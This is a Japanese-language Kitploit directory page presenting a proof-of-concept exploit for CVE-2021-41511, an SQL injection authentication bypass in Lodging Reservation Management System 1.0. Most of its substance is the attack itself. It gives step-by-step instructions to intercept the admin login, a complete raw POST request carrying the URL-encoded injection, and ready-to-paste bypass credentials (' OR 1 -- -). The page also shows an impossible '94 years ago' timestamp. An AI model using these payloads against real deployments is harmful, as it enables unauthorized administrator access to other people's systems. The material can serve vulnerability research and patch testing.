Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-41511 — Lodging Reservation Management System 1.0のSQLインジェクションと認証バイパスの概念実証エクスプロイトで、細工されたペイロードを介して不正な管理者アクセスを可能にします。 | Kitploit
ツール/GitHubGitHub/vidvansh/cve-2021-41511
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubvidvansh/cve-2021-41511

CVE-2021-41511

Lodging Reservation Management System 1.0のSQLインジェクションと認証バイパスの概念実証エクスプロイトで、細工されたペイロードを介して不正な管理者アクセスを可能にします。

リポジトリを見る
94年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-41511

エクスプロイトタイトル: Lodging Reservation Management System 1.0 - SQLインジェクション / 認証バイパス

エクスプロイト作者: Nitin Sharma(vidvansh)

ベンダーホームページ: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html

ソフトウェアリンク: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code

バージョン: v1.0

テスト環境: Windows 10 - XAMPP Server

説明 : パスワード入力は不適切なサニタイズにより認証バイパスの影響を受け、権限のないアカウントへのアクセスを招きます。

#再現手順: ステップ1 製品の管理者パネル http://localhost/lodge/admin/login.php にアクセスします。 ステップ2 – ユーザー名とパスワードに任意の値を入力します。 ステップ3 – 「ログイン」をクリックし、Burp Suiteでリクエストをキャプチャします。 ステップ4 – ユーザー名を ' OR 1 -- - に、パスワードを ' OR 1 -- - に変更します。 ステップ5 – Forwardをクリックすると、管理者としてログインできます。

PoC:

POST /lodge/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/lodge/admin/login.php Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin

username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+

認証バイパス:

管理者ログインページ (http://localhost/lodge/admin/login.php) にアクセスし、以下のペイロードをユーザー名とパスワードとして使用します =>

Username: ' or 1 -- - Password: ' or 1 -- -

ツールをダウンロード